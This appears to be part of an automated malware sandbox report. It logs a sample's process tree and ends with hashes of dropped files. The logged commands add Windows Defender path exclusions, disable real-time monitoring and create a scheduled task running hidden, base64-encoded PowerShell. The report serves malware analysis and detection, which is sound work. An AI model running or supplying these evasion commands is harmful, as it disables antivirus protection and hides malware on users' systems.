C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:980
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2156
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:644⤵PID:1688
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:644⤵PID:700
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:324⤵PID:1876
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:644⤵PID:2016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:324⤵PID:3008
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:644⤵PID:772
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:324⤵PID:2556
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:644⤵PID:2836
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:324⤵PID:2792
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:644⤵PID:2476
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:324⤵PID:892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1596 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2616 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2064 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2928 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:760 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2840 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1692 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2756 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1656 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1376 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2252 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2072 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2412 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2400 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:643⤵PID:1588
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaFtpSRup"3⤵PID:3004
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaFtpSRup" /SC once /ST 17:40:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1944 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:323⤵PID:2680
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:643⤵PID:2708
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2124
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:641⤵
- Modifies Windows Defender Real-time Protection settings
PID:952
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2468
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:321⤵PID:1648
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:641⤵PID:2804
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "303402502-17147885563196457681702126387126727367-1997115842-13115463071087322843"1⤵PID:1660
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "10341538901392894401-8757807511898178787120762267728448201310902796291051527832"1⤵PID:2384
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1212
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "823407083-1296150777-19760549141405620939-387368756768100271290963101463530343"1⤵
- Drops file in Windows directory
PID:2208
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:641⤵
- Windows security bypass
PID:2656
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.1MB
MD5271b4c62b67f85e2dfa800a406fefd86
SHA1d0bf4731837c22399c435a93dde7416ab0255297
SHA2564000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA5123aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize
6.1MB
MD5271b4c62b67f85e2dfa800a406fefd86
SHA1d0bf4731837c22399c435a93dde7416ab0255297
SHA2564000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA5123aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51d04a7af85c8c41960456a01ba1c9baf
SHA184f128c1c3404873f7b3428635e2fcab1fde8a2e
SHA2561a96a85c267662334632bed702e9f1883a33a2c596dcd4730f9133173f17ae3a
SHA5121fbd7432d1d84299d624c47225b458a81ec72a78d2efc01f3bcdf7e52da523da5efdaff7279160db45a8ddc2387c1f6f39f02a0a803b340bff2ba6294a4c3504
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5933340831dd6fb791001c6d67adb18ee
SHA1ed5413c030287b51190a7f55802e4cc97bc6cce1
SHA256ec8b63bcefed9d2daf407a1c0dd390e4c7049ceb99d0cbfd3880afc5a60cd7a3
SHA512045537a93759cecea0b9ab8b03302eda4a0ec85e2e183a645b9336817427b157a070695c646b2fc768fe9ea8dc3c6dff61d0d2b7d08685536dba7ecf8ff8b18c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b6b54dc6d1f0f9ead39156c924bf8a3d
SHA1da58d0252f3a6540cde3de4818b5b649f29c8a18
SHA256ddfd593a5a4f2179cf498546ffae1c63749a59d801d92169398c047a58a18ee5
SHA51282a3ac8e8141e4bdb1e0b225724866ae5a2bcaf7d12972bff3234c27c1a9ea3d9274109b3c080c68648354407829009f9ec459f2c803129af610ad3a46d47594
-
Filesize
9KB
MD54cdc1b066431a6e1477defe20137ad08
SHA1a58f4ac7343c9741a1fa675d4658a2af96dcacd1
SHA25697b132755de4e5ab992900956be4fc6ae8b528c056c2279b286bbebdc5a201fb
SHA51201e468ebd9d5b839585391767b3c37e99acab8efeff3b23ae4fbf7cf2323fac439477ae34152b45d942a0dea7ac287f086548d1372dfc69a4b7ec6f404ffbb89
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD5271b4c62b67f85e2dfa800a406fefd86
SHA1d0bf4731837c22399c435a93dde7416ab0255297
SHA2564000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA5123aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize
6.1MB
MD5271b4c62b67f85e2dfa800a406fefd86
SHA1d0bf4731837c22399c435a93dde7416ab0255297
SHA2564000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA5123aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize
6.1MB
MD5271b4c62b67f85e2dfa800a406fefd86
SHA1d0bf4731837c22399c435a93dde7416ab0255297
SHA2564000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA5123aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize
6.1MB
MD5271b4c62b67f85e2dfa800a406fefd86
SHA1d0bf4731837c22399c435a93dde7416ab0255297
SHA2564000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA5123aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0